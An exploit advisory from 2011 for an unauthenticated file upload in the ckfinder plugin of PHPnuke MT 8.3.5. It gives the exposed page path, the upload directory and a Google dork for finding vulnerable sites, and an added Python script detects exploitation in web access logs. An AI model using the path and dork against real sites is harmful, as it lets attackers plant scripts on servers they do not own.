# Exploit Title: PHPnuke MT 8.3.5 ckfinder Plugin Arbitrary File Upload Vulnerability
# Date: 2011 06 27 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://www.phpnuke.ir/
# Version : 8.3.5
# Tested on: Ubuntu 11.04 ~ CentOS
# CVE : -

---------------------------------------------------------------------------
PHPnuke MT 8.3 ckfinder Plugin Arbitrary File Upload Vulnerability => RFU
---------------------------------------------------------------------------

Author       : Net.Edit0r
Date         : 2011 06 27
Location     : Iran
Web          : http://Black-Hg.Org
Critical Lvl : Medium
Where        : From Remote
My Group     : Black Hat Group #BHG
---------------------------------------------------------------------------

PoC/Exploit:
~~~~~~~~~~
~ [PoC] ~: /includes/ckfinder/ckfinder.html le.php
~ [PoC] ~: Http://[victim]/path-to-nuke//includes/ckfinder/ckfinder.html

[ Upload To : /includes/ckfinder/files/Filename ]

Dork:
~~~~~
Google : inurl:"PHP-Nuke Project By PHPNuke.ir"

Video Demo:
~~~~~
http://net-edit0r.persiangig.com/nuke.rar

Timeline:
~~~~~~~~~
- 24-06-2011 bug found.
- 27-06-2011 vendor contacted, but no response.
- 27-06-2011 advisory released.

Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com

---------------------------------------------------------------------------
Greetz To : DarkCoder | 3H34N | Amir-MaGiC | H3x | and all BHG members
Special Th4nks: B3hz4d | M4Hd1 | Cru3l.boy | Mikili | +_AttAcK_+ And All My Friendz

[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People

-------------------------------- [ EOF ] ----------------------------------
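
Detection note (an added example, not part of the original advisory): the script below reviews web access logs for the two request patterns the PoC section implies, a successful response from the ckfinder page and requests for script-like files under /includes/ckfinder/files/. The combined log format, the extension list, the finding labels and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Paths below come from the advisory; the extension list is an assumption.
UI_PATH = "/includes/ckfinder/ckfinder.html"
UPLOAD_DIR = "/includes/ckfinder/files/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|cgi|asp|aspx|jsp)(\.|/|$)")
# Assumed input: Apache/nginx "combined" access-log format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')

def normalise(target):
    """Drop the query string, percent-decode, collapse '//' and lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def classify(line):
    """Return (client_ip, finding) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path, served = normalise(target), status.startswith("2")
    at = path.find(UPLOAD_DIR)
    # A script-like name (including double extensions) under the upload dir.
    if at != -1 and SCRIPT_EXT.search(path[at + len(UPLOAD_DIR):]):
        return (ip, "script-in-upload-dir" + ("-served" if served else ""))
    # The file-manager page answered 2xx to this client.
    if path.endswith(UI_PATH) and served:
        return (ip, "ckfinder-ui-reachable")
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [27/Jun/2011:10:01:02 +0700] "GET /nuke//includes/ckfinder/ckfinder.html HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [27/Jun/2011:10:03:40 +0700] "GET /nuke/includes/ckfinder/files/test.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.9 - - [27/Jun/2011:10:05:00 +0700] "GET /nuke/includes/ckfinder/files/photo.jpg HTTP/1.1" 200 30211 "-" "-"',
    '203.0.113.9 - - [27/Jun/2011:10:06:00 +0700] "GET /nuke/includes/ckfinder/files/a%2Ephp.jpg HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

A "-served" finding means the server answered 2xx for a script-like name inside the upload directory, which is the case to triage first; the file on disk and the handler configuration for that directory still have to be checked to confirm whether anything executed.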